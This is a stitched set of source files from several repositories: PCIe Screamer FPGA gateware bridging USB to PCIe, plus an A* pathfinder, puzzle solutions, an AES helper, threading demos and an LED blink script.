return
with pager.nopager():
with redirect.nolog():
height = min(bits.get_width_height(term)[1] for term in range(bits.get_term_count()))
r = inc = height - 1
sys.stdout.write(string.join(lines[:inc], '\n') + '\n')
while True:
if lines[r:]:
advance = ['any key to advance']
else:
advance = ['END']
if r > inc:
back = ["Up/PgUp to go back"]
else:
back = []
options = "; ".join(advance + back + efi_options + ["q to quit"])
prompt = '-- {} --'.format(options)
prompt_len = len(prompt)
sys.stdout.write(prompt)
c = bits.input.get_key()
key = bits.input.key
# Write the spaces one at a time to defeat word-wrap
sys.stdout.write('\r')
for i in range(prompt_len):
sys.stdout.write(' ')
sys.stdout.write('\r')
if efi_options and c in (key('f'), key('F')):
ttydir = efi.get_boot_fs()
filepath = os.path.normpath(str.strip(readline._readline("filename: "), "\n"))
basepath, fname = os.path.split(filepath)
for dirname in str.split(basepath, os.sep):
if dirname is not "":
ttydir = ttydir.mkdir(dirname)
print "Saving {}...".format(filepath),
ttydir.create(fname).write(string.join(lines, '\n') + '\n')
print "Done"
print "Hit any key to continue..."
c = bits.input.get_key()
if c in (key('q'), key('Q')):
break
elif c in (key('\r'), key('\n'), key(bits.input.KEY_DOWN), key('n', ctrl=True)):
if lines[r:]:
sys.stdout.write(lines[r] + '\n')
r = r + 1
continue
if c == key(bits.input.KEY_HOME):
bits.clear_screen()
r = 0
if c == key(bits.input.KEY_END):
bits.clear_screen()
r = len(lines) - inc
if r < 0:
r = 0
if c in (key(bits.input.KEY_UP), key('p', ctrl=True)):
bits.clear_screen()
r = r - 1 - inc
if r < 0:
r = 0
if c in (key(bits.input.KEY_PAGE_UP), key('b'), key('B')):
bits.clear_screen()
r = r - inc - inc
if r < 0:
r = 0
if lines[r:]:
sys.stdout.write(string.join(lines[r:r+inc], '\n') + '\n')
r = r + inc
if not lines[r:]:
r = len(lines)
_wrapper = textwrap.TextWrapper(width=77, subsequent_indent=' ')
_wrapper_indentall = textwrap.TextWrapper(width=77, initial_indent=' ', subsequent_indent=' ')
def _wrap(str, indent=True):
def __wrap():
wrapper = _wrapper
for line in str.split("\n"):
# Preserve blank lines, for which wrapper emits an empty list
if not line:
yield ""
for wrapped_line in wrapper.wrap(line):
yield wrapped_line
if indent:
wrapper = _wrapper_indentall
return '\n'.join(__wrap())
def ttypager_wrap(text, indent=True):
ttypager(_wrap(text, indent))
class ProgressStringIO(object):
def __init__(self):
self.progress = itertools.cycle('|/-\\')
self.gathering = 'Gathering output...'
with pager.nopager():
with redirect.nolog():
sys.stdout.write('\r' + self.gathering)
self.sio = StringIO()
def write(self, s):
with pager.nopager():
with redirect.nolog():
sys.stdout.write('\r' + self.gathering + self.progress.next())
self.sio.write(s)
def getvalue(self):
with pager.nopager():
with redirect.nolog():
sys.stdout.write('\r' + ' ' * (len(self.gathering) + 1) + '\r')
return self.sio.getvalue()
def __getattr__(self, name):
return getattr(self.sio, name)
@contextlib.contextmanager
def page():
"""Capture output to stdout/stderr, and send it through ttypager when done"""
out = ProgressStringIO()
with redirect._redirect_stdout(out):
with redirect._redirect_stderr(out):
try:
yield
output = out.getvalue()
except:
import traceback
output = (traceback.format_exc()
+ "\nOutput produced before exception:\n\n"
+ out.getvalue())
ttypager_wrap(output, indent=False)
``` |
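A usage sketch for the `page()` context manager, assuming the BITS environment:

```python
import ttypager

with ttypager.page():
    # everything printed here is gathered (with a spinner) and then
    # presented through the pager once the block exits
    for n in range(200):
        print("line {}".format(n))
```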
{
"source": "3mdeb/pcie_screamer",
"score": 2
} |
#### File: pcie_screamer/gateware/ft601.py
```python
from migen import *
from migen.fhdl.specials import Tristate
from litex.soc.interconnect import stream
from litex.soc.cores.usb_fifo import phy_description
class FT601Sync(Module):
def __init__(self, pads, dw=32, timeout=1024):
read_fifo = ClockDomainsRenamer({"write": "usb", "read": "sys"})(stream.AsyncFIFO(phy_description(dw), 128))
write_fifo = ClockDomainsRenamer({"write": "sys", "read": "usb"})(stream.AsyncFIFO(phy_description(dw), 128))
read_buffer = ClockDomainsRenamer("usb")(stream.SyncFIFO(phy_description(dw), 4))
self.comb += read_buffer.source.connect(read_fifo.sink)
self.submodules += read_fifo
self.submodules += read_buffer
self.submodules += write_fifo
self.read_buffer = read_buffer
self.sink = write_fifo.sink
self.source = read_fifo.source
self.tdata_w = tdata_w = Signal(dw)
self.data_r = data_r = Signal(dw)
self.data_oe = data_oe = Signal()
self.specials += Tristate(pads.data, tdata_w, data_oe, data_r)
data_w = Signal(dw)
_data_w = Signal(dw)
self.sync.usb += [
_data_w.eq(data_w)
]
for i in range(dw):
self.specials += [
Instance("ODDR",
p_DDR_CLK_EDGE="SAME_EDGE",
i_C=ClockSignal("usb"), i_CE=1, i_S=0, i_R=0,
i_D1=_data_w[i], i_D2=data_w[i], o_Q=tdata_w[i]
)
]
self.rd_n = rd_n = Signal()
_rd_n = Signal(reset=1)
self.wr_n = wr_n = Signal()
_wr_n = Signal(reset=1)
self.oe_n = oe_n = Signal()
_oe_n = Signal(reset=1)
self.sync.usb += [
_rd_n.eq(rd_n),
_wr_n.eq(wr_n),
_oe_n.eq(oe_n),
]
self.specials += [
Instance("ODDR",
p_DDR_CLK_EDGE="SAME_EDGE",
i_C=ClockSignal("usb"), i_CE=1, i_S=0, i_R=0,
i_D1=_rd_n, i_D2=rd_n, o_Q=pads.rd_n
),
Instance("ODDR",
p_DDR_CLK_EDGE="SAME_EDGE",
i_C=ClockSignal("usb"), i_CE=1, i_S=0, i_R=0,
i_D1=_wr_n, i_D2=wr_n, o_Q=pads.wr_n
),
Instance("ODDR",
p_DDR_CLK_EDGE="SAME_EDGE",
i_C=ClockSignal("usb"), i_CE=1, i_S=0, i_R=0,
i_D1=_oe_n, i_D2=oe_n, o_Q=pads.oe_n
)
]
self.comb += [
pads.rst.eq(~ResetSignal("usb")),
pads.be.eq(0xf),
pads.siwua.eq(1),
data_oe.eq(oe_n),
]
fsm = FSM()
self.submodules.fsm = ClockDomainsRenamer("usb")(fsm)
self.tempsendval = tempsendval = Signal(dw)
self.temptosend = temptosend = Signal()
self.tempreadval = tempreadval = Signal(dw)
self.temptoread = temptoread = Signal()
self.wants_read = wants_read = Signal()
self.wants_write = wants_write = Signal()
self.cnt_write = cnt_write = Signal(max=timeout+1)
self.cnt_read = cnt_read = Signal(max=timeout+1)
first_write = Signal()
self.comb += [
wants_read.eq(~temptoread & ~pads.rxf_n),
wants_write.eq((temptosend | write_fifo.source.valid) & (pads.txe_n == 0)),
]
self.fsmstate = Signal(4)
self.comb += [
self.fsmstate.eq(Cat(fsm.ongoing("IDLE"),
fsm.ongoing("WRITE"),
fsm.ongoing("RDWAIT"),
fsm.ongoing("READ")))
]
self.sync.usb += [
If(~fsm.ongoing("READ"),
If(temptoread,
If(read_buffer.sink.ready,
temptoread.eq(0)
)
)
)
]
self.comb += [
If(~fsm.ongoing("READ"),
If(temptoread,
read_buffer.sink.data.eq(tempreadval),
read_buffer.sink.valid.eq(1),
)
)
]
fsm.act("IDLE",
rd_n.eq(1),
wr_n.eq(1),
If(wants_write,
oe_n.eq(1),
NextValue(cnt_write, 0),
NextValue(first_write, 1),
NextState("WRITE"),
).Elif(wants_read,
oe_n.eq(0),
NextState("RDWAIT")
).Else(
oe_n.eq(1),
)
)
fsm.act("WRITE",
If(wants_read,
NextValue(cnt_write, cnt_write + 1),
),
NextValue(first_write, 0),
rd_n.eq(1),
If(pads.txe_n,
oe_n.eq(1),
wr_n.eq(1),
write_fifo.source.ready.eq(0),
If(write_fifo.source.valid & ~first_write,
NextValue(temptosend, 1)
),
NextState("IDLE")
).Elif(temptosend,
oe_n.eq(1),
data_w.eq(tempsendval),
wr_n.eq(0),
NextValue(temptosend, 0)
).Elif(cnt_write > timeout,
oe_n.eq(0),
NextState("RDWAIT")
).Elif(write_fifo.source.valid,
oe_n.eq(1),
data_w.eq(write_fifo.source.data),
write_fifo.source.ready.eq(1),
NextValue(tempsendval, write_fifo.source.data),
NextValue(temptosend, 0),
wr_n.eq(0),
).Else(
oe_n.eq(1),
wr_n.eq(1),
NextValue(temptosend, 0),
NextState("IDLE")
)
)
fsm.act("RDWAIT",
rd_n.eq(0),
oe_n.eq(0),
wr_n.eq(1),
NextValue(cnt_read, 0),
NextState("READ")
)
fsm.act("READ",
If(wants_write,
NextValue(cnt_read, cnt_read + 1),
),
wr_n.eq(1),
If(pads.rxf_n,
oe_n.eq(0),
rd_n.eq(1),
NextState("IDLE"),
).Elif(cnt_read > timeout,
NextValue(cnt_write, 0),
NextValue(first_write, 1),
NextState("WRITE"),
oe_n.eq(1),
).Else(
oe_n.eq(0),
read_buffer.sink.valid.eq(1),
read_buffer.sink.data.eq(data_r),
NextValue(tempreadval, data_r),
If(read_buffer.sink.ready,
rd_n.eq(0)
).Else(
NextValue(temptoread, 1),
NextState("IDLE"),
rd_n.eq(1)
)
)
)
```
#### File: 3mdeb/pcie_screamer/pcie_screamer.py
```python
import argparse
import os
from migen import *
from migen.genlib.resetsync import AsyncResetSynchronizer
from litex.build.generic_platform import *
from litex.soc.cores.clock import *
from litex.soc.integration.soc_core import *
from litex.soc.integration.builder import *
from litex.soc.interconnect import stream
from litex.soc.cores.uart import UARTWishboneBridge
from litex.soc.cores.usb_fifo import phy_description
from litepcie.phy.s7pciephy import S7PCIEPHY
from gateware.usb import USBCore
from gateware.etherbone import Etherbone
from gateware.tlp import TLP
from gateware.msi import MSI
from gateware.ft601 import FT601Sync
from litescope import LiteScopeAnalyzer
# CRG ----------------------------------------------------------------------------------------------
class _CRG(Module):
def __init__(self, platform, sys_clk_freq):
self.clock_domains.cd_sys = ClockDomain()
self.clock_domains.cd_usb = ClockDomain()
# # #
# sys
sys_clk_100 = platform.request("clk100")
platform.add_period_constraint(sys_clk_100, 1e9/100e6)
self.submodules.pll = pll = S7PLL(speedgrade=-1)
pll.register_clkin(sys_clk_100, 100e6)
pll.create_clkout(self.cd_sys, sys_clk_freq)
# usb
usb_clk100 = platform.request("usb_fifo_clock")
platform.add_period_constraint(usb_clk100, 1e9/100e6)
self.comb += self.cd_usb.clk.eq(usb_clk100)
self.specials += AsyncResetSynchronizer(self.cd_usb, ResetSignal("pcie"))
# PCIeScreamer -------------------------------------------------------------------------------------
class PCIeScreamer(SoCMini):
usb_map = {
"wishbone": 0,
"tlp": 1
}
def __init__(self, platform, with_analyzer=True, with_loopback=False):
sys_clk_freq = int(100e6)
# SoCMini ----------------------------------------------------------------------------------
SoCMini.__init__(self, platform, sys_clk_freq, ident="PCIe Screamer", ident_version=True)
# CRG --------------------------------------------------------------------------------------
self.submodules.crg = _CRG(platform, sys_clk_freq)
# Serial Wishbone Bridge -------------------------------------------------------------------
self.submodules.bridge = UARTWishboneBridge(platform.request("serial"), sys_clk_freq, baudrate=3e6)
self.add_wb_master(self.bridge.wishbone)
# PCIe PHY ---------------------------------------------------------------------------------
self.submodules.pcie_phy = S7PCIEPHY(platform, platform.request("pcie_x1"))
self.add_csr("pcie_phy")
# USB FT601 PHY ----------------------------------------------------------------------------
self.submodules.usb_phy = FT601Sync(platform.request("usb_fifo"), dw=32, timeout=1024)
# USB Loopback -----------------------------------------------------------------------------
if with_loopback:
self.submodules.usb_loopback_fifo = stream.SyncFIFO(phy_description(32), 2048)
self.comb += [
self.usb_phy.source.connect(self.usb_loopback_fifo.sink),
self.usb_loopback_fifo.source.connect(self.usb_phy.sink)
]
# USB Core ---------------------------------------------------------------------------------
else:
self.submodules.usb_core = USBCore(self.usb_phy, sys_clk_freq)
# USB <--> Wishbone --------------------------------------------------------------------
self.submodules.etherbone = Etherbone(self.usb_core, self.usb_map["wishbone"])
self.add_wb_master(self.etherbone.master.bus)
# USB <--> TLP -------------------------------------------------------------------------
self.submodules.tlp = TLP(self.usb_core, self.usb_map["tlp"])
self.comb += [
self.pcie_phy.source.connect(self.tlp.sender.sink),
self.tlp.receiver.source.connect(self.pcie_phy.sink)
]
# Wishbone --> MSI -------------------------------------------------------------------------
self.submodules.msi = MSI()
self.comb += self.msi.source.connect(self.pcie_phy.msi)
self.add_csr("msi")
# Led blink --------------------------------------------------------------------------------
usb_counter = Signal(32)
self.sync.usb += usb_counter.eq(usb_counter + 1)
self.comb += platform.request("user_led", 0).eq(usb_counter[26])
pcie_counter = Signal(32)
self.sync.pcie += pcie_counter.eq(pcie_counter + 1)
self.comb += platform.request("user_led", 1).eq(pcie_counter[26])
# Analyzer ---------------------------------------------------------------------------------
if with_analyzer:
analyzer_signals = [
self.pcie_phy.sink,
self.pcie_phy.source,
]
self.submodules.analyzer = LiteScopeAnalyzer(analyzer_signals, 1024, csr_csv="test/analyzer.csv")
self.add_csr("analyzer")
# Build --------------------------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(description="PCIe Screamer Test Gateware")
parser.add_argument("--m2", action="store_true", help="use M2 variant of PCIe Screamer")
parser.add_argument("--with-analyzer", action="store_true", help="enable Analyzer")
parser.add_argument("--with-loopback", action="store_true", help="enable USB Loopback")
parser.add_argument("--build", action="store_true", help="Build bitstream")
parser.add_argument("--load", action="store_true", help="Load bitstream")
parser.add_argument("--flash", action="store_true", help="Flash bitstream")
args = parser.parse_args()
if args.m2:
from platforms.pcie_screamer_m2 import Platform
else:
from platforms.pcie_screamer import Platform
platform = Platform()
soc = PCIeScreamer(platform, args.with_analyzer, args.with_loopback)
builder = Builder(soc, csr_csv="test/csr.csv")
builder.build(run=args.build)
if args.load:
prog = soc.platform.create_programmer()
prog.load_bitstream(os.path.join(builder.gateware_dir, soc.build_name + ".bit"))
if args.flash:
prog = soc.platform.create_programmer()
prog.load_bitstream(os.path.join(builder.gateware_dir, soc.build_name + ".bin"))
if __name__ == "__main__":
main()
```
#### File: pcie_screamer/software/etherbone.py
```python
import socket
from litex.soc.tools.remote.etherbone import *
from litex.soc.tools.remote.csr_builder import CSRBuilder
class Etherbone(CSRBuilder):
def __init__(self, csr_csv=None, csr_data_width=32, debug=False):
if csr_csv is not None:
CSRBuilder.__init__(self, self, csr_csv, csr_data_width)
self.debug = debug
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def read(self, addr, length=None):
length_int = 1 if length is None else length
datas = []
for i in range(length_int):
record = EtherboneRecord()
record.reads = EtherboneReads(addrs=[addr + 4*i])
record.rcount = 1
packet = EtherbonePacket()
packet.records = [record]
packet.encode()
self.socket.sendto(bytes(packet), ("127.0.0.1", 1234))
data, addr = self.socket.recvfrom(1024)
packet = EtherbonePacket(data)
packet.decode()
datas.append(packet.records.pop().writes.get_datas()[0])
if self.debug:
for i, data in enumerate(datas):
print("read {:08x} @ {:08x}".format(data, addr + 4*i))
return datas[0] if length is None else datas
def write(self, addr, datas):
datas = datas if isinstance(datas, list) else [datas]
for i, data in enumerate(datas):
record = EtherboneRecord()
record.writes = EtherboneWrites(base_addr=addr + 4*i, datas=[data])
record.wcount = 1
packet = EtherbonePacket()
packet.records = [record]
packet.encode()
self.socket.sendto(bytes(packet), ("127.0.0.1", 1234))
if self.debug:
print("write {:08x} @ {:08x}".format(data, addr + 4*i))
if __name__ == '__main__':
etherbone = Etherbone()
print("Testing SRAM write/read:")
for i in range(32):
etherbone.write(0x10000000 + 4*i, i)
print("%08x" %etherbone.read(0x10000000 + 4*i))
identifier = ""
for i in range(0, 32):
identifier += "%c" %etherbone.read(0xe0001800 + 4*i)
print("\nSoC identifier: " + identifier)
pcie_id = etherbone.read(0xe000881c)
print("\nPCIe ID: %04x" %pcie_id)
```
#### File: pcie_screamer/test/test_loopback.py
```python
def main():
f = open("/dev/ft60x0", "r+b")
f.write(bytearray([0x41, 0x42, 0x43, 0x44]))
f.write(bytearray([0x45, 0x46, 0x47, 0x48]))
data = f.read(4)
print(data.hex())
data = f.read(4)
print(data.hex())
if __name__ == "__main__":
main()
``` |
{
"source": "3met/A-Star-Pathfinding",
"score": 2
} |
#### File: A-Star-Pathfinding/src/a_star.py
```python
import random
import numpy as np
# S for start
# E for end
# ' ' for empty
# O for big obstacle (Blocks path)
# o for small obstacle (Slows path)
# x for path
GRID = (('.', '.', '.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', 'O', '.', '.', 'E'),
('.', '.', '.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', 'O', '.', '.', '.'),
('.', 'O', '.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', 'O', '.', '.', '.', 'O', '.', '.', '.'),
('.', 'O', '.', '.', '.', '.', '.', 'O', '.', 'o', 'o', 'o', 'O', '.', '.', '.', 'O', '.', '.', '.'),
('.', 'O', '.', '.', '.', 'O', '.', 'O', '.', '.', '.', '.', 'O', '.', '.', '.', 'O', 'O', '.', '.'),
('.', 'O', 'O', 'O', '.', 'O', '.', 'O', '.', '.', '.', '.', 'O', '.', '.', '.', '.', 'o', '.', '.'),
('.', '.', 'O', '.', '.', 'O', '.', 'O', '.', '.', '.', '.', 'O', '.', 'O', '.', '.', '.', '.', '.'),
('.', '.', 'O', '.', '.', 'O', '.', 'O', '.', '.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', '.'),
('.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', 'O', '.', 'O', 'O', 'O', 'O'),
('.', '.', '.', '.', '.', 'O', '.', '.', 'O', 'O', 'O', 'O', '.', '.', 'O', '.', '.', '.', '.', '.'),
('.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', '.', 'O', 'o', 'o', 'O', '.', '.', '.', '.', '.'),
('.', '.', '.', '.', '.', 'O', '.', 'O', 'O', '.', '.', 'O', '.', '.', 'O', '.', '.', '.', '.', '.'),
('.', '.', '.', '.', '.', 'O', '.', '.', 'O', 'O', '.', 'O', '.', '.', 'O', '.', '.', '.', '.', '.'),
('.', '.', 'o', '.', '.', 'O', '.', '.', '.', 'O', '.', 'O', '.', '.', 'O', '.', '.', '.', '.', '.'),
('.', '.', 'O', '.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', 'O', 'O', 'O', '.', '.', '.'),
('.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.'),
('.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', 'O', 'O', 'O', '.', '.', '.', '.', '.', '.'),
('.', '.', 'O', '.', '.', '.', '.', 'O', 'O', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.'),
('.', '.', 'O', '.', '.', '.', '.', '.', 'O', 'O', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.'),
('S', '.', 'O', '.', '.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.'),
)
# Cost of walking one tile horizontal or vertical
CARDINAL_COST = 10
# Cost of walking one tile diagonal
DIAGONAL_COST = 14
# Added cost of walking on obstacle node
OBSTACLE_COST = 30
# Path class
# Used for storage of movement values
class Path:
def __init__(self):
# Creates a list to store path movements
self.path = []
# Returns number of path movements
def __len__(self):
        return len(self.path)
# Prints path movements
def __str__(self):
        return str(self.path)
# Adds a movement to the path
def add(self, direction):
self.path.append(direction)
# Pastes the path on a grid object
def paste(self, grid):
        # Copy into a mutable list of lists so path tiles can be written
        grid = [list(row) for row in grid]
# --- Finds the Start Position ---
start_pos = []
exit = False
# Loops through each node in grid
        for row_i in range(len(grid)):
            for col_i in range(len(grid[row_i])):
                # Checks if the node is the start position (pos stores [x, y])
                if grid[row_i][col_i] == 'S':
                    start_pos = [col_i, row_i]
exit = True
break
if exit:
break
pos = list(start_pos)
# Loops through path movements
for direction in self.path:
# Updates position based on path movement
if direction == 'U':
pos[1] += -1
elif direction == 'R':
pos[0] += 1
elif direction == 'D':
pos[1] += 1
elif direction == 'L':
pos[0] += -1
# Update node value
grid[pos[1]][pos[0]] = 'x'
return grid
# Displays the path on passed grid
def show(self, grid):
        grid = self.paste(grid)
for row in grid:
print(*row, sep='')
# Nodes class
# Used for storage node type, location, cost value, and list of connected nodes
class Node():
def __init__(self):
self.is_start = False
self.is_end = False
self.walkable = True
self.type = '.'
self.x = 0
self.y = 0
self.e = 0 # Elevation of node
self.f_cost = 0
self.g_cost = 0 # Distance from start node
self.h_cost = 0 # Distance from end node
self.last = None
self.connected = set()
# Returns distance between two nodes
def distance_to(self, node):
dx = abs(self.x-node.x)
dy = abs(self.y-node.y)
dist = 10*abs(dx-dy)
dist += 14*min(dx, dy)
return dist
@staticmethod
# Calculates F cost
def calc_f_cost(origin, destination, end):
# G cost + H cost
return __class__.calc_g_cost(origin, destination) + __class__.calc_h_cost(origin, end)
# Calculates g cost
@staticmethod
def calc_g_cost(origin, destination):
return origin.g_cost + __class__.distance(origin, destination) + destination.e
# Calculates h cost
@staticmethod
def calc_h_cost(origin, end):
return __class__.distance(origin, end)
# Calculates distance between two nodes
@staticmethod
def distance(node, node2):
dx = abs(node.x-node2.x)
dy = abs(node.y-node2.y)
dist = 10*abs(dx-dy)
dist += 14*min(dx, dy)
return dist
# Grid class
# Stores 2d array of nodes based on 2d array of values
class Grid:
def __init__(self, grid):
self.grid = grid
self.solved_grid = None
self.path = Path()
self.coord_path = []
self.solved = False
self.node_grid = []
self.start = Node()
self.end = Node()
# Fills 2d array with nodes
for i in range(len(grid)):
self.node_grid.append([])
for j in range(len(grid[i])):
self.node_grid[i].append(Node())
# Reads passed grid and store values in nodes array
for i in range(len(grid)):
for j in range(len(grid[i])):
for k in range(-1, 2):
for l in range(-1, 2):
if k != 0 or l != 0:
try:
if (i + k) >= 0 and (j + l) >= 0:
self.node_grid[i][j].connected.add(self.node_grid[i + k][j + l])
except IndexError:
pass
self.node_grid[i][j].type = grid[i][j]
self.node_grid[i][j].x = j
self.node_grid[i][j].y = i
if self.node_grid[i][j].type != '.' and self.node_grid[i][j].type != ' ':
if grid[i][j] == 'O':
self.node_grid[i][j].walkable = False
elif grid[i][j] == 'o':
self.node_grid[i][j].e += OBSTACLE_COST
# Sets start and end node
elif grid[i][j] == 'S':
self.start = self.node_grid[i][j]
self.node_grid[i][j].is_start = True
elif grid[i][j] == 'E':
self.end = self.node_grid[i][j]
self.node_grid[i][j].is_end = True
# Updates the grid with a solved path
def a_star(self):
opened = []
closed = set()
opened.append(self.start)
while True:
if len(opened) == 0:
                raise Exception("Error. No path could be found.")
lowest_index = 0
for n_index in range(1, len(opened)):
if opened[n_index].f_cost < opened[lowest_index].f_cost:
lowest_index = n_index
# Store current node in temp variable and remove node from open list
current_node = opened[lowest_index]
opened.remove(current_node)
closed.add(current_node)
# Checks if the end node has been found
if current_node.is_end:
while True:
current_node.type = 'x'
if current_node.is_start:
break
else:
current_node = current_node.last
self.solved = True
return self.path
for connected_node in current_node.connected:
# If in open list
if connected_node in opened:
updated_g_cost = Node.calc_g_cost(current_node, connected_node)
if connected_node.g_cost > updated_g_cost:
connected_node.g_cost = updated_g_cost
connected_node.f_cost = Node.calc_f_cost(current_node, connected_node, self.end)
connected_node.last = current_node
# If not in open list and not in closed list
elif connected_node not in closed and connected_node.walkable:
connected_node.last = current_node
connected_node.g_cost = Node.calc_g_cost(current_node, connected_node)
connected_node.f_cost = Node.calc_f_cost(current_node, connected_node, self.end)
opened.append(connected_node)
# Displays the grid
def show(self):
for row in self.grid:
print(*row, sep=' ')
# Prints solved grid
def show_solved(self):
if self.solved:
for i in range(len(self.node_grid)):
for j in range(len(self.node_grid[i])):
print(self.node_grid[i][j].type, end=' ')
print() # New line
else:
print("Grid is unsolved. Use Grid solve method to solve.")
# Main Function
def main():
grid = Grid(GRID)
print("\nUnsolved Grid:")
grid.show()
print("\nSolved Grid:")
grid.a_star()
grid.show_solved()
if __name__ == "__main__":
main()
``` |
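`Node.distance` (and `distance_to`) compute octile distance: `DIAGONAL_COST` (14) per diagonal step plus `CARDINAL_COST` (10) per remaining straight step. A standalone check of the formula:

```python
def octile(dx, dy):
    # 14 for each diagonal step, 10 for each remaining straight step
    return 14 * min(dx, dy) + 10 * abs(dx - dy)

assert octile(3, 0) == 30   # three straight moves
assert octile(2, 2) == 28   # two diagonal moves
assert octile(3, 1) == 34   # one diagonal plus two straight moves
```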
{
"source": "3mmar7amed/Practice-Problems",
"score": 4
} |
#### File: Practice-Problems/2015-09-28/knight-coins.py
```python
def getRich(n):
days = list(range(n))
pay, days_until_pay_increase = 1, 1
total = 0
for day in days:
total += pay
days_until_pay_increase -= 1
if days_until_pay_increase == 0:
pay += 1
days_until_pay_increase = pay
return total
def main():
input_f = open("GoldCoinsInput.txt", 'r')
output_f = open("GoldCoinsOutput.txt", 'w')
for n in input_f:
n = int(n)
if n == 0: break
output_f.write(str(getRich(n)) + "\n")
input_f.close()
output_f.close()
if __name__ == "__main__":
main()
```
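Because pay level `k` is paid on exactly `k` consecutive days, `getRich` also has a closed form: the sum of `k**2` over the completed levels plus the leftover days at the next level. A sketch that can be cross-checked against the loop above:

```python
def get_rich_closed_form(n):
    # largest k with k*(k+1)/2 <= n, i.e. the number of completed pay levels
    k = int(((8 * n + 1) ** 0.5 - 1) // 2)
    total = k * (k + 1) * (2 * k + 1) // 6       # sum of k**2 for full levels
    total += (n - k * (k + 1) // 2) * (k + 1)    # leftover days at pay k+1
    return total

assert get_rich_closed_form(4) == 8    # 1 + 2 + 2 + 3
assert get_rich_closed_form(10) == 30  # four complete pay levels
```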
#### File: Practice-Problems/2016-11-15/AESCipher.py
```python
from Crypto import Random
from Crypto.Cipher import AES
import base64, hashlib
class AESCipher(object):
def __init__(self, key):
# Store SHA-256 digest of key
self.key = hashlib.sha256(key.encode('utf-8')).digest()
self.bs = 32
def _pad(self, s):
area_to_pad = self.bs - len(s) % self.bs
padding = area_to_pad * chr(area_to_pad).encode('utf-8')
return s + padding
def _unpad(self, s):
return s[:-ord(s[len(s) - 1:])]
def encrypt(self, data):
data = self._pad(data.encode('utf-8'))
iv = Random.new().read(AES.block_size)
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return base64.b64encode(iv + cipher.encrypt(data)).decode('utf-8')
def decrypt(self, ciphertext):
ciphertext = base64.b64decode(ciphertext)
iv = ciphertext[:AES.block_size]
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self._unpad(cipher.decrypt(ciphertext[AES.block_size:])).decode('utf-8')
```
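A round-trip usage sketch for the class above, assuming the PyCrypto (`Crypto`) package is installed:

```python
cipher = AESCipher("correct horse battery staple")
# Every call produces a different token, because a fresh random IV is
# generated and prepended to the ciphertext on each encrypt().
token = cipher.encrypt("attack at dawn")
assert cipher.decrypt(token) == "attack at dawn"
```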
#### File: 2016naq/team-one/probD.py
```python
def main():
line = raw_input()
if line == '':
print('possible')
return
if len(line) % 2 == 1:
print('impossible')
return
i = 0
j = len(line) - 1
swapped = False
poss = True
while i < j:
ch1 = line[i]
ch2 = line[j]
if ch1 == ')' and ch2 == '(':
if swapped:
poss = False
break
swapped = True
elif ch1 == ')' and ch2 == ')':
if swapped:
poss = False
break
swapped = True
elif ch1 == '(' and ch2 == '(':
if swapped:
poss = False
break
swapped = True
i += 1
j -= 1
if poss:
print('possible')
else:
print('impossible')
main()
```
#### File: Practice-Problems/2017-1-26/threading_example2.py
```python
import threading
import time
class myThread(threading.Thread):
def __init__(self, threadID, name, counter):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.counter = counter
def run(self):
print('Starting ' + self.name)
calculateMass(self.name, self.counter, 5)
print('Exiting ' + self.name)
def calculateMass(threadName, delay, counter):
for i in range(counter):
time.sleep(delay)
print('{0}: on iteration {1}'.format(threadName, i+1))
def calculateDensity(threadName):
print('{} starting to calculate the density...'.format(threadName))
total = 0
for i in range(5555):
for j in range(9999):
total += 1
print('{} finished calculating density...'.format(threadName))
thread1 = myThread(1, 'Thread-1', 1)
thread2 = threading.Thread(target=calculateDensity, name='Thread-2', args=['Thread-2'])
# Start threads
thread1.start()
thread2.start()
print('Exiting main thread...')
```
#### File: Practice-Problems/2017-1-26/threading_timer_example.py
```python
import threading
import time
def hello():
print('Hello')
t = threading.Timer(5.0, hello)
t.start()
print('After started the timer')
``` |
{
"source": "3mp3ri0r/cpyfunctional",
"score": 4
} |
#### File: cpyfunctional/tests/tests_func_curry.py
```python
import unittest
import cpyfunctional
class TestFuncCurry(unittest.TestCase):
"""
Test func_curry function able to make callable accept parameters.
"""
def test_func_curry_able_to_make_callable_accept_params(self):
"""
func_curry given callable that given multiple params, able to return value from them.
"""
def add(number1: int, number2: int, prev_number: int) -> int:
return number1 + number2 + prev_number
result = cpyfunctional.compose(cpyfunctional.func_curry(add)(5, 7), lambda number: number ** 2)(3)
self.assertEqual(result, 21)
``` |
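The test only pins down the library's semantics: `compose` applies callables right-to-left and `func_curry` binds leading arguments, with the piped value arriving last. A minimal sketch with those semantics — an illustration, not `cpyfunctional`'s actual implementation:

```python
from functools import reduce

def compose(*functions):
    # right-to-left composition: compose(f, g)(x) == f(g(x))
    return reduce(lambda f, g: lambda x: f(g(x)), functions)

def func_curry(func):
    # bind leading arguments now; the composed-in value arrives last
    return lambda *args: lambda prev: func(*args, prev)

add = lambda a, b, prev: a + b + prev
assert compose(func_curry(add)(5, 7), lambda n: n ** 2)(3) == 21  # 5+7+3**2
```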
{
"source": "3M-Pi-Robot/RobotHack2021",
"score": 3
} |
#### File: RobotHack2021/led3/led3.py
```python
import pin
import time
def f15():
# 1 + 5
pin.Out("LED1",1)
pin.Out("LED2",0)
pin.Out("LED3",0)
pin.Out("LED4",0)
pin.Out("LED5",1)
time.sleep(0.5)
def f24():
# 2 + 4
pin.Out("LED1",0)
pin.Out("LED2",1)
pin.Out("LED3",0)
pin.Out("LED4",1)
pin.Out("LED5",0)
time.sleep(0.5)
def f3():
# 3
pin.Out("LED1",0)
pin.Out("LED2",0)
pin.Out("LED3",1)
pin.Out("LED4",0)
pin.Out("LED5",0)
time.sleep(0.5)
